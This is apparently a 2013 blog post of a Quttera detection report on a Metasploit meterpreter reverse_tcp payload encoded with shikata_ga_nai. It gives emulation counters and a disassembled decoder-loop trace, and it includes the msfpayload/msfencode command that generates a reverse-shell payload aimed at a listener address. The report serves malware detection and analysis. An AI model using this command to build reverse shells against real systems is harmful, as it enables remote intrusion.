Monday, March 18, 2013

Quttera investigation engine scan report for Metasploit's reverse_tcp payload encoded with the x86/shikata_ga_nai encoder

Quttera investigation engine statistics of the detected payload

Offset of the detected payload: 0

Payload generation command

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.111.129 LPORT=9988 R| msfencode -e x86/shikata_ga_nai -t raw

Payload emulation counters:

WRITES_TO_PROCESS_STACK_MEMORY: 0
BUFFER_INSIDE_WRITES_COUNT: 24
REFERENCES_TO_PROCESS_INTERNALS: 0
BUFFER_OUTSIDE_WRITES_COUNT: 0
FAR_JUMPS_COUNT: 0
FULLY_INITIALIZED_INSTRUCTIONS: 99
PROVIDED_ABSOLUTE_MEMORY_ADDRESSES: 1
PROC_CALLS_INSIDE_INV_BUFFER: 0
BUFFER_OUTSIDE_READS_COUNT: 1
UNDEFINED_DIRECT_CALLS: 0
JUMPS_INSIDE_INV_BUFFER: 23
CORRECTLY_PARSED_INSTRUCTIONS: 100
MEMORY_MODIFYING_MATH_INSTRUCTIONS: 0
BUFFER_INSIDE_READS_COUNT: 24
SYSTEM_CALLS_COUNT: 0
UNRECOGNIZED_CALL_TARGETS: 0
REFERENCES_TO_PROCESS_IMPORTS: 0
CORRECT_PROCEDURES_CALLS: 0
EIP_RETRIEVAL_INSTRUCTIONS: 1
JUMPS_TO_PROCESS_INTERNALS: 0
EXECUTED_ARITHMETIC_INSTRUCTIONS: 24
CALLS_TARGETED_IMPORTS_SECTION: 0
UNRECOGNIZED_JUMP_TARGETS: 0
CONSEQUENT_SINGLE_BYTE_INSTRUCTIONS: 0
REFERENCES_TO_PROCESS_EXPORTS: 0
EXECUTES_BITS_OPERATING_INSTRUCTIONS: 0
IMMEDIATE_OPERANDS_INSTRUCTIONS: 0
INDIRECT_BUFFER_REFERENCES: 23
MAX_WRITTEN_MEMORY_BLOCK: 0
CORRECTLY_EXECUTED_INSTRUCTIONS: 100
READS_FROM_PROCESS_STACK_MEMORY: 1
CALLS_TARGETED_EXPORTS_SECTION: 0

Read more about the Quttera investigation engine here.

Detection disassembly (emulation trace; the value in parentheses after each operand is the register contents or effective address observed at that step):

MOV EBX (0x00000000),0x7D1F6180
FCMOVB ST0 (0x0000000000000000),ST3 (0x0000000000000001)
FNSTENV [ESP - 0xC] (0x087A29DB)
POP EDX (0x00000000)
XOR ECX (0x00000000),ECX (0x00000000)
MOV CL (0x00),0x49
XOR DS:[EDX + 0x14] (0xBFC74815),EBX (0x7D1F6180) ;investigation buffer write instruction
ADD EBX (0x7D1F6180),DS:[EDX + 0x14] (0xBFC74815) ;investigation buffer read instruction
ADD EDX (0xBFC74801),0x04
LOOP 0xF5 ;random read instruction
XOR DS:[EDX + 0x14] (0xBFC74819),EBX (0x661C5762) ;investigation buffer write instruction
ADD EBX (0x661C5762),DS:[EDX + 0x14] (0xBFC74819) ;investigation buffer read instruction
ADD EDX (0xBFC74805),0x04
LOOP 0xF5 ;random read instruction
XOR DS:[EDX + 0x14] (0xBFC7481D),EBX (0x661C57EB) ;investigation buffer write instruction
ADD EBX (0x661C57EB),DS:[EDX + 0x14] (0xBFC7481D) ;investigation buffer read instruction
ADD EDX (0xBFC74809),0x04
LOOP 0xF5 ;random read instruction
XOR DS:[EDX + 0x14] (0xBFC74821),EBX (0x9801E14B) ;investigation buffer write instruction
ADD EBX (0x9801E14B),DS:[EDX + 0x14] (0xBFC74821) ;investigation buffer read instruction
ADD EDX (0xBFC7480D),0x04
LOOP 0xF5 ;random read instruction
XOR DS:[EDX + 0x14] (0xBFC74825),EBX (0xEA8D461D) ;investigation buffer write instruction
ADD EBX (0xEA8D461D),DS:[EDX + 0x14] (0xBFC74825) ;investigation buffer read instruction
ADD EDX (0xBFC74811),0x04
LOOP 0xF5 ;random read instruction
XOR DS:[EDX + 0x14] (0xBFC74829),EBX (0xF6DFD14D) ;investigation buffer write instruction
ADD EBX (0xF6DFD14D),DS:[EDX + 0x14] (0xBFC74829) ;investigation buffer read instruction
ADD EDX (0xBFC74815),0x04
LOOP 0xF5 ;random read instruction
XOR DS:[EDX + 0x14] (0xBFC7482D),EBX (0x81F423D8) ;investigation buffer write instruction
ADD EBX (0x81F423D8),DS:[EDX + 0x14] (0xBFC7482D) ;investigation buffer read instruction
ADD EDX (0xBFC74819),0x04
LOOP 0xF5 ;random read instruction
XOR DS:[EDX + 0x14] (0xBFC74831),EBX (0x39034C4A) ;investigation buffer write instruction
ADD EBX (0x39034C4A),DS:[EDX + 0x14] (0xBFC74831) ;investigation buffer read instruction
ADD EDX (0xBFC7481D),0x04
LOOP 0xF5 ;random read instruction
XOR DS:[EDX + 0x14] (0xBFC74835),EBX (0x38347294) ;investigation buffer write instruction
ADD EBX (0x38347294),DS:[EDX + 0x14] (0xBFC74835) ;investigation buffer read instruction
ADD EDX (0xBFC74821),0x04
LOOP 0xF5 ;random read instruction
XOR DS:[EDX + 0x14] (0xBFC74839),EBX (0x74E132C5) ;investigation buffer write instruction
ADD EBX (0x74E132C5),DS:[EDX + 0x14] (0xBFC74839) ;investigation buffer read instruction
ADD EDX (0xBFC74825),0x04
LOOP 0xF5 ;random read instruction
XOR DS:[EDX + 0x14] (0xBFC7483D),EBX (0xA0E3AF26) ;investigation buffer write instruction
ADD EBX (0xA0E3AF26),DS:[EDX + 0x14] (0xBFC7483D) ;investigation buffer read instruction
ADD EDX (0xBFC74829),0x04
LOOP 0xF5 ;random read instruction
XOR DS:[EDX + 0x14] (0xBFC74841),EBX (0xAEB37046) ;investigation buffer write instruction
ADD EBX (0xAEB37046),DS:[EDX + 0x14] (0xBFC74841) ;investigation buffer read instruction
ADD EDX (0xBFC7482D),0x04
LOOP 0xF5 ;random read instruction
XOR DS:[EDX + 0x14] (0xBFC74845),EBX (0x9F963747) ;investigation buffer write instruction
ADD EBX (0x9F963747),DS:[EDX + 0x14] (0xBFC74845) ;investigation buffer read instruction
ADD EDX (0xBFC74831),0x04
LOOP 0xF5 ;random read instruction
XOR DS:[EDX + 0x14] (0xBFC74849),EBX (0xF2218E99) ;investigation buffer write instruction
ADD EBX (0xF2218E99),DS:[EDX + 0x14] (0xBFC74849) ;investigation buffer read instruction
ADD EDX (0xBFC74835),0x04
LOOP 0xF5 ;random read instruction
XOR DS:[EDX + 0x14] (0xBFC7484D),EBX (0x2E6419A9) ;investigation buffer write instruction
ADD EBX (0x2E6419A9),DS:[EDX + 0x14] (0xBFC7484D) ;investigation buffer read instruction
ADD EDX (0xBFC74839),0x04
LOOP 0xF5 ;random read instruction
XOR DS:[EDX + 0x14] (0xBFC74851),EBX (0x6EEFE9AA) ;investigation buffer write instruction
ADD EBX (0x6EEFE9AA),DS:[EDX + 0x14] (0xBFC74851) ;investigation buffer read instruction
ADD EDX (0xBFC7483D),0x04
LOOP 0xF5 ;random read instruction
XOR DS:[EDX + 0x14] (0xBFC74855),EBX (0xE3B06F22) ;investigation buffer write instruction
ADD EBX (0xE3B06F22),DS:[EDX + 0x14] (0xBFC74855) ;investigation buffer read instruction
ADD EDX (0xBFC74841),0x04
LOOP 0xF5 ;random read instruction
XOR DS:[EDX + 0x14] (0xBFC74859),EBX (0x3480706C) ;investigation buffer write instruction
ADD EBX (0x3480706C),DS:[EDX + 0x14] (0xBFC74859) ;investigation buffer read instruction
ADD EDX (0xBFC74845),0x04
LOOP 0xF5 ;random read instruction
XOR DS:[EDX + 0x14] (0xBFC7485D),EBX (0xBF98B8F7) ;investigation buffer write instruction
ADD EBX (0xBF98B8F7),DS:[EDX + 0x14] (0xBFC7485D) ;investigation buffer read instruction
ADD EDX (0xBFC74849),0x04
LOOP 0xF5 ;random read instruction
XOR DS:[EDX + 0x14] (0xBFC74861),EBX (0x9299D94F) ;investigation buffer write instruction
ADD EBX (0x9299D94F),DS:[EDX + 0x14] (0xBFC74861) ;investigation buffer read instruction
ADD EDX (0xBFC7484D),0x04
LOOP 0xF5 ;random read instruction
XOR DS:[EDX + 0x14] (0xBFC74865),EBX (0x1DE31632) ;investigation buffer write instruction
ADD EBX (0x1DE31632),DS:[EDX + 0x14] (0xBFC74865) ;investigation buffer read instruction
ADD EDX (0xBFC74851),0x04
LOOP 0xF5 ;random read instruction
XOR DS:[EDX + 0x14] (0xBFC74869),EBX (0xF3E4A166) ;investigation buffer write instruction
ADD EBX (0xF3E4A166),DS:[EDX + 0x14] (0xBFC74869) ;investigation buffer read instruction
ADD EDX (0xBFC74855),0x04
LOOP 0xF5 ;random read instruction
XOR DS:[EDX + 0x14] (0xBFC7486D),EBX (0xB416A097) ;investigation buffer write instruction
ADD EBX (0xB416A097),DS:[EDX + 0x14] (0xBFC7486D) ;investigation buffer read instruction
ADD EDX (0xBFC74859),0x04
LOOP 0xF5 ;random read instruction
XOR DS:[EDX + 0x14] (0xBFC74871),EBX (0xC1E66243) ;investigation buffer write instruction
ADD EBX (0xC1E66243),DS:[EDX + 0x14] (0xBFC74871) ;investigation buffer read instruction